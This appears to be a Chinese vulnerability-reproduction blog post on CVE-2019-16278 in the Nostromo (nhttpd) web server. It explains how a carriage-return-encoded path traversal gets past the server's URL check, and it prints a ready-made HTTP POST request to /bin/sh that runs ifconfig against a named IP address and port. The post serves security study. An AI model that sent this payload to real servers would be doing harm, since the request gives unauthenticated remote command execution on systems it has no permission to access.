漏洞复现----2、Nostromo Web服务器远程命令执行(CVE-2019-16278)
2023-09-11 14:17:06 时间
一、漏洞背景
Nostromo web(又名nhttpd),这是一个开源的web服务,在Unix系统上非常流行,例如FreeBSD, OpenBSD等。
Nostromo由于在验证URL安全性方面存在缺陷,导致目录穿越,任何人都可以遍历系统中任何文件。因此未经过身份验证的远程攻击者可以强制服务器指向/bin/sh这样的shell文件,借此执行任意命令。 在CVE-2011-0751中攻击者可以通过/..%2f..%2f..%2fbin/sh
来实现路径穿越,而后官方修复了该漏洞,CVE-2019-16278是对CVE-2011-0751的绕过,使用/.%0d./.%0d./.%0d./
绕过对路径穿越的限制.
影响版本
Nostromo web<=1.9.6
二、漏洞原理
在下图的函数http_verify()
中,请求的首行会先进行解码,然后检查/../
是否存在.
函数http_proc()
会将首行传递给函数http_header()
函数http_header()
通过函数strcutl()
解析数据
函数strcutl()
的内部,会过滤字符串中的\r
(回车)
最后,得到的路径是/../../../../bin/sh
。
目录穿越完成后,在函数http_proc()
中的execve()
函数中,执行了rh->rq_filef(/../../../../bin/sh
)。
三、漏洞复现
POST /.%0d./.%0d./.%0d./.%0d./bin/sh HTTP/1.1
Host: 113.108.70.111:50124
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/79.0.3945.79 Safari/537.36
Content-Length: 25
echo
echo
ifconfig 2>&1
参考:
https://nosec.org/home/detail/3074.html https://github.com/jas502n/CVE-2019-16278
相关文章
- CVE-2011-0104:Microsoft Office Excel 栈溢出漏洞修复分析
- web服务器、Web中间件和Web容器的区别
- (转)计算机漏洞安全相关的概念POC 、EXP 、VUL 、CVE 、0DAY
- Jumpserver受控服务器任意命令执行漏洞通告
- 通达OA权限提升漏洞通告
- 文件上传漏洞——服务器检测与绕过2
- SQLmap检测sql注入漏洞
- 帝国cms漏洞分析前台XSS漏洞
- spring框架漏洞整理(Spring Boot Actuator命令执行漏洞)
- spring框架漏洞整理(Spring Data漏洞)
- 研究发现有加密货币僵尸服务器在WannaCry蠕虫前利用微软漏洞
- MySQL现高危漏洞,可致服务器root权限被窃取
- 极棒(GeekPwn)实验室:物联网安全堪忧 loT设备存大量低级漏洞